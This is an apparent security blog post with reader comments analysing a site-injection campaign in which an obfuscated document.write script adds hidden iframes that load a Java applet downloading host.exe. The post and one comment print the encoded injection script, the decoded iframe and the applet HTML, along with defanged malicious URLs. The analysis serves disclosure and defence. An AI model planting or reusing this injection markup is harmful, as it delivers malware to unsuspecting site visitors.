Injected Script Loads Host.exe Using Hidden Iframes and Java Applets
Today, I can see many blacklisted sites where Google report one of the following three domains as a source of the problem:
- aubreyserr .com
- medien-verlag .de
- yennicq .be
E.g.
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
On infected sites, I found an obfuscated malicious script at the very bottom of HTML code
document .write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D...skipped...\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');
Unmask Parasites detects the injected malicious scripts quite well. Here you can see how it looks in a sample report:
When people load the infected pages, this code injects a hidden iframe
<IFR AME name="x" src="http://www.medien-verlag .de/ new.htm" width="0" height="0" scrolling="no" frameborder="0" marginwidth="1" marginheight="1"></IFRAM E>
In other variations, the iframe may be from www.aubreyserr .com/ new.htm or www.yennicq .be/ new.htm.
The page loaded by the iframe is very simple
<html>
<body>
<ap plet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">
<param name="url" value="hxxp://www.medien-verlag .de/ host.exe">
</applet>
</p>
<p></p>
</div>
</body></html>
As you can see, it only loads a Java Applet Hidde.jar with one parameter that point to the “host.exe” file in the root of the same site.
VirusTotal
I decided to check the files using VirusTotal to find out how different anti-virus tools detect them.
Hidden.jar
Only 10 out of 36 tools consider this file malicious. Most of them recognize it as some sort of “Java Downloader“. So I guess all it does is downloading another malicious file onto a victim’s computer. In this case, the file that’s being downloaded is that “host.exe“. So let’s check this file.
Host.exe
24 out of 43 www.medien-verlag.de/host.exe as malicious. Quite poor detection rate. The following popular AV tools still can’t detect it 11 hours after my initial VirusTotal check: Avast, Kaspersky, Microsoft, Sophos, TrendMicro.
So what about host.exe files from other sites? They seems to be different on each site.
Right now 30 out of 42 tools detect www.yennicq .be/host.exe it as malicious. All major anti-viruses (except for Kaspersky and Microsoft) do a good job here.
www.aubreyserr .com/host.exe does quite well too: 30 out of 43.
Malware hosted on legitimate websites
I should also mention that all three domains belong to legitimate websites on three different servers. Once again (as in Gumblar and Koobface), hackers use compromised sites to host malicious files and use them to attack visitors to hacked third-party sites.
Prevalence
According to Google’s Safe Browsing project, there are currently about 2,000 known infected sites:
- medien-verlag .de — 1414 infected domains
- aubreyserr .com — 168 infected domains
- yennicq .be — 405 infected domains
You help is welcome
I’ve only started this investigation today, so a lot remains unclear. E.g. what security hole is used to compromise affected sites? Is the injected script the only modification to the hacked sites? Are there any other domains involved in this attack? etc. If you have answers to these questions or just want to share your thoughts, please join the discussion in the comments.
Related posts:
Reader's Comments (8)
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
[...] This post was mentioned on Twitter by Denis. Denis said: [blog] Injected Script Loads Host.exe Using Hidden Iframes and Java Applets http://bit.ly/eq1At2 – more info required [...]
Some of the sites hosted at the data center got infected too. Here is the script they changed in index.html and index.php.
document write(‘\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\
u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u006E\u0061\u0072\
u0063\u006F\u0073\u002E\u006E\u006C\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\
u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\
u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\
u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\
u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E’
);
The files are changed on 23rd Dec 2010 around 11:48 PM.
Thanks.
The code translates to a similar iframe from “hxxp://www .narcos .nl/ new.htm”
SANS ISC has a blog post on what looks like the same malware http://isc.sans.edu/diary.html?storyid=10168
Indeed, the same malware. It has more detailed information on how the malicious Java downloader works.
A few more malicious URLs from that post.
hxxp://benaguasil. net/ new.htm
hxxp://mavi1. org/ new.htm
I’ve been hacked too.
I had several ‘domains’ hosted on that account, but they only changed 2 index.php files with that redirect.
I think they entered trough a sketchup document I hosted, but i have no idea how.
get hacked again and this time it is from
hxxp://caktu.com/new.htm
The hacker comes in through http port. Still finding out how did in hacked in.
I was wondering if the “hosts.exe” causes your Windows’ hosts file to load an acceptable host domain which otherwise would be rejected.
Anyhow, just a wild thought.